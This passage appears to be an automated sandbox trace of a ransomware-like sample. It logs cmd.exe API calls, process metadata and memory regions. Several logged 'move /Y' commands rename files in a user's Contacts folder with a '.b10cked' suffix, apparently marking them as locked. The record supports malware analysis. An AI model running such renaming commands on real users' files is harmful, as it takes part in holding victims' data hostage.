returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"" [0218.567] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"" [0218.568] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a005260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.568] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0218.568] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.568] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.568] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.568] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0218.568] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0218.568] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0218.568] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0218.568] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0218.568] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0218.568] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0218.568] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0218.568] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0218.568] GetEnvironmentStringsW () returned 0x2f22d0* [0218.568] FreeEnvironmentStringsW (penv=0x2f22d0) returned 1 [0218.568] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.568] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.568] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0218.568] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0218.568] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0218.569] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0218.569] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0218.569] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0218.569] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0218.569] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0218.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f918 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.569] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f918, lpFilePart=0x24f914 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f914*="Desktop") returned 0x18 [0218.569] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.569] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f694 | out: lpFindFileData=0x24f694) returned 0x2f0010 [0218.569] FindClose (in: hFindFile=0x2f0010 | out: hFindFile=0x2f0010) returned 1 [0218.569] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f694 | out: lpFindFileData=0x24f694) returned 0x2f0010 [0218.569] FindClose (in: hFindFile=0x2f0010 | out: hFindFile=0x2f0010) returned 1 [0218.569] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f694 | out: lpFindFileData=0x24f694) returned 0x2f0010 [0218.569] FindClose (in: hFindFile=0x2f0010 | out: hFindFile=0x2f0010) returned 1 [0218.569] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.569] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0218.570] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0218.570] 
GetEnvironmentStringsW () returned 0x2f2af0* [0218.570] FreeEnvironmentStringsW (penv=0x2f2af0) returned 1 [0218.570] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a005260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.570] GetConsoleOutputCP () returned 0x1b5 [0218.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0218.570] GetUserDefaultLCID () returned 0x409 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a004950, cchData=8 | out: lpLCData=":") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fa58, cchData=128 | out: lpLCData="0") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fa58, cchData=128 | out: lpLCData="0") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fa58, cchData=128 | out: lpLCData="1") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a004940, cchData=8 | out: lpLCData="/") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a004d80, cchData=32 | out: lpLCData="Mon") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a004d40, cchData=32 | out: lpLCData="Tue") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a004d00, cchData=32 | out: lpLCData="Wed") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a004cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a004c80, cchData=32 | out: lpLCData="Fri") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a004c40, cchData=32 | out: lpLCData="Sat") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a004c00, cchData=32 | out: lpLCData="Sun") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a004930, 
cchData=8 | out: lpLCData=".") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a004920, cchData=8 | out: lpLCData=",") returned 2 [0218.572] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.572] GetConsoleTitleW (in: lpConsoleTitle=0x2e08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.573] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.573] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0218.573] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0218.573] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0218.573] _wcsicmp (_String1="move", _String2=")") returned 68 [0218.573] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0218.573] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0218.573] _wcsicmp (_String1="IF", _String2="move") returned -4 [0218.573] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0218.573] _wcsicmp (_String1="REM", _String2="move") returned 5 [0218.574] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0218.576] GetConsoleTitleW (in: lpConsoleTitle=0x24f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.576] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0218.576] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0218.576] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0218.576] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0218.576] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="CD") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="REN") returned -5 [0218.576] _wcsicmp 
(_String1="move", _String2="ECHO") returned 8 [0218.576] _wcsicmp (_String1="move", _String2="SET") returned -6 [0218.576] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0218.576] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0218.576] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0218.576] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0218.576] _wcsicmp (_String1="move", _String2="MD") returned 11 [0218.576] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0218.576] _wcsicmp (_String1="move", _String2="RD") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0218.576] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0218.576] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0218.576] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0218.577] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0218.577] _wcsicmp (_String1="move", _String2="VER") returned -9 [0218.577] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0218.577] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0218.577] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0218.577] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0218.577] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0218.577] _wcsicmp (_String1="move", _String2="START") returned -6 [0218.577] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0218.577] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0218.577] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0218.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f50c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f504, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f504*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp 
(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0218.579] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0218.579] _wcsicmp (_String1="IHNVBH~1.CON", _String2=".") returned 59 [0218.579] _wcsicmp (_String1="IHNVBH~1.CON", _String2="..") returned 59 [0218.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh~1.con")) returned 0x20 [0218.580] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2f1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.580] SetErrorMode (uMode=0x0) returned 0x0 [0218.580] SetErrorMode (uMode=0x1) returned 0x0 [0218.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", nBufferLength=0x104, lpBuffer=0x24ee94, lpFilePart=0x24ee7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", 
lpFilePart=0x24ee7c*="IHNVBH~1.CON") returned 0x26 [0218.580] SetErrorMode (uMode=0x0) returned 0x1 [0218.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0218.580] _wcsicmp (_String1="IHNVBH~1.CON", _String2=".") returned 59 [0218.580] _wcsicmp (_String1="IHNVBH~1.CON", _String2="..") returned 59 [0218.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh~1.con")) returned 0x20 [0218.580] SetErrorMode (uMode=0x0) returned 0x0 [0218.580] SetErrorMode (uMode=0x1) returned 0x0 [0218.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", nBufferLength=0x104, lpBuffer=0x24f310, lpFilePart=0x24f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", lpFilePart=0x24f0a8*="IHNVBH~1.CON") returned 0x26 [0218.580] SetErrorMode (uMode=0x0) returned 0x1 [0218.580] SetErrorMode (uMode=0x0) returned 0x0 [0218.580] SetErrorMode (uMode=0x1) returned 0x0 [0218.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", nBufferLength=0x104, lpBuffer=0x24f518, lpFilePart=0x24f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", lpFilePart=0x24f0a8*="ihnvbh euuncnh.contact.b10cked") returned 0x38 [0218.580] SetErrorMode (uMode=0x0) returned 0x1 [0218.581] SetLastError (dwErrCode=0x0) [0218.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.b10cked")) returned 0xffffffff [0218.581] GetLastError () returned 0x2 [0218.581] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x24ea24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ea24) returned 0x2e0e68 [0218.581] FindNextFileW (in: hFindFile=0x2e0e68, 
lpFindFileData=0x24ea24 | out: lpFindFileData=0x24ea24) returned 0 [0218.581] GetLastError () returned 0x12 [0218.581] FindClose (in: hFindFile=0x2e0e68 | out: hFindFile=0x2e0e68) returned 1 [0218.582] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x2f1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2f1bd8) returned 0x2e0e68 [0218.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", nBufferLength=0x104, lpBuffer=0x24ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", lpFilePart=0x0) returned 0x38 [0218.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x104, lpBuffer=0x24ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0218.582] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact")) returned 0x20 [0218.582] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.b10cked"), dwFlags=0x3) returned 1 [0218.583] FindClose (in: hFindFile=0x2e0e68 | out: hFindFile=0x2e0e68) returned 1 [0218.583] _vsnwprintf (in: _Buffer=0x4a005040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ec70 | out: _Buffer=" 1") returned 9 [0218.583] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.583] GetFileType (hFile=0x7) returned 0x2 [0218.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.583] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ebfc | out: lpMode=0x24ebfc) returned 1 [0218.583] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0218.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ec30 | out: lpConsoleScreenBufferInfo=0x24ec30) returned 1 [0218.583] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a014640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0218.584] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a014640, nSize=0x2000, Arguments=0x24ec70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0218.584] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a014640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ec54, lpReserved=0x0 | out: lpBuffer=0x4a014640*, lpNumberOfCharsWritten=0x24ec54*=0x1a) returned 1 [0218.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.584] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.584] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0041ac | out: lpMode=0x4a0041ac) returned 1 [0218.584] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.584] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0041b0 | out: lpMode=0x4a0041b0) returned 1 [0218.584] SetConsoleInputExeNameW () returned 0x1 [0218.584] GetConsoleOutputCP () returned 0x1b5 [0218.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0218.584] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.585] exit (_Code=0) Process: id = "566" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"" cur_dir = 
"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32772 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32773 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32774 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32775 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 32776 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32777 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32778 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32779 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32780 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name 
= "private_0x000000007ffde000" filename = "" Region: id = 32781 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32840 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32841 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32842 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 32843 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32844 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 32845 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32846 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32847 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32848 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32849 start_va = 0x76a90000 end_va = 
0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32850 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32851 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32852 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32853 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32864 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 32865 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32866 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32867 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32868 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 32869 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 
